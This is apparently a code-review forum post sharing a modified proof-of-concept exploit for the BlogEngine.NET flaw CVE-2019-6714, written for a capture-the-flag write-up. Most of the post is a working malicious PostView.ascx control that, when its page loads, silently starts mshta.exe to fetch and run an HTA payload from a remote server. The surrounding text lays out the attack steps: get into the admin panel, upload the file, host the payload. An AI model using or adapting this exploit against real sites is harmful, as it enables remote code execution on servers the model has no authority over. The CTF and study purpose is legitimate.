# Modified PoC for BlogEngine.NET CMS (CVE-2019-6714)

Tags: c#, programming-challenge, .net, security, asp.net

This is a modified exploit proof of concept targeting the [BlogEngine.NET content management system](https://blogengine.io) (CVE-2019-6714) for the .NET framework. I modified it (from [Cobb 2019](https://www.exploit-db.com/exploits/46353)) to execute payloads via `mshta.exe` as opposed to its original implementation: which was to initiate a generic reverse shell via C#'s network socket programming interface. I [uploaded the modified version to one of my GitHub repos](https://github.com/Alekseyyy/InfoSec/blob/master/exploits/CVE-2019-6714.cs); here is the source code minus most of the comments:

```cs
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);
        System.Diagnostics.Process payload = new System.Diagnostics.Process();
        payload.StartInfo.FileName = "mshta.exe";
        payload.StartInfo.Arguments = ""; // url to HTA with payload
        payload.StartInfo.UseShellExecute = true;
        payload.StartInfo.CreateNoWindow = true;
        payload.Start();
    }
    
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
```

Basically, you gain access to the BlogEngine.NET CMS's panel running on the target system and then upload the PoC as `PostView.ascx` onto the BlogEngine.NET based website. Before doing so, you need to setup a server with an HTA payload and configure the line `payload.StartInfo.Arguments = "";` to include a link to the HTA payload.

This was done for a CTF writeup ([Aleksey 2022](https://infosecwriteups.com/tryhackme-writeup-hackpark-bd9c075c5262)) and I would your feedback on my (albeit unoriginal) exploit. Some things that I would be interested from y'all:

- Do you feel that I have a good [coding style](https://en.wikipedia.org/wiki/Programming_style)?
- Whilst this isn't totally original, do you feel that my modified PoC is worth "showing off" or can be used as a case study in exploit development?

Any feedback or criticisms would be much appreciated :D